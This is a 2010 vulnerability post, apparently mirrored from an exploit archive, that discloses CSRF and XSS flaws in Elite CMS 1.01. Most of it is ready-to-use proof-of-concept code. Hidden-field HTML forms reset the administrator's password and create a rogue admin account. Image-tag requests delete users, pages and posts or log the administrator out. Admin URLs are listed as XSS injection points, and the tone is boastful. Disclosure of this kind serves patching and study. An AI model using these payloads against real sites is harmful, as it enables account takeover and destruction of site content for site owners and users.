Home / os / win7

Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities

Posted on 12 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================ Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities ================================================ # Name: Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities # Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt; # Date: Sat 10 Jul 2010 08:05:44 PM EEST # Vendor: http://elitecms.net/ # Download: http://elitecms.net/download.php?download=eliteCMS -=[ CSRF PoC 1 - Change Admin Password ]=- &lt;html&gt; &lt;head&gt; &lt;title&gt;Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Change Admin Password&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!--- Edit these ---&gt; &lt;form action=&quot;http://[domain]/admin/edit_user.php?user=1&quot; method=&quot;post&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;pwned&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;pwn@pwned.com&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;first_name&quot; value=&quot;pwned&quot; /&gt; &lt;!--- Do not edit below ---&gt; &lt;input type=&quot;hidden&quot; name=&quot;s_admin&quot; value=&quot;1&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;active&quot; value=&quot;1&quot; /&gt; &lt;!--- At least they check this ---&gt; &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Continue&quot; /&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; -=[ CSRF PoC 2 - Create Admin User ]=- &lt;html&gt; &lt;head&gt; &lt;title&gt;Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Create Admin User&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!--- Edit these ---&gt; &lt;form action=&quot;http://[domain]/admin/new_user.php&quot; method=&quot;post&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;user_name&quot; value=&quot;root&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;root&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;root@root.com&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;first_name&quot; value=&quot;root&quot;/&gt; &lt;!--- Do not edit below ---&gt; &lt;input type=&quot;hidden&quot; name=&quot;s_admin&quot; value=&quot;1&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;active&quot; value=&quot;1&quot; /&gt; &lt;!--- At least they check this ---&gt; &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Continue&quot; /&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; -=[ CSRF PoC 3 - Delete User ]=- &lt;img src=&quot;http://[domain]/admin/delete_user.php?user=2&quot; alt=&quot;Do you see this?&quot; /&gt; -=[ CSRF PoC 4 - Delete Page ]=- &lt;img src=&quot;http://[domain]/admin/delete_page.php?page=1&quot; alt=&quot;Do you see this?&quot; /&gt; -=[ CSRF PoC 5 - Delete Post ]=- &lt;img src=&quot;http://[domain]/admin/delete_post.php?post=1&quot; alt=&quot;Do you see this?&quot; /&gt; -=[ CSRF PoC 6 - Logout The Administrator ]=- &lt;img src=&quot;http://[domain]/admin/logout.php&quot; alt=&quot;Do you see this?&quot; /&gt; -=[ XSS ]=- http://[domain]/admin/edit_page.php?page=1[XSS] http://[domain]/admin/edit_post.php?page=1[XSS] http://[domain]/admin/add_post.php?page=1[XSS] Also all of the text fields in the administration panel accept xss code. Not so l33t huh? Visit us at http://www.evilzone.org/. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP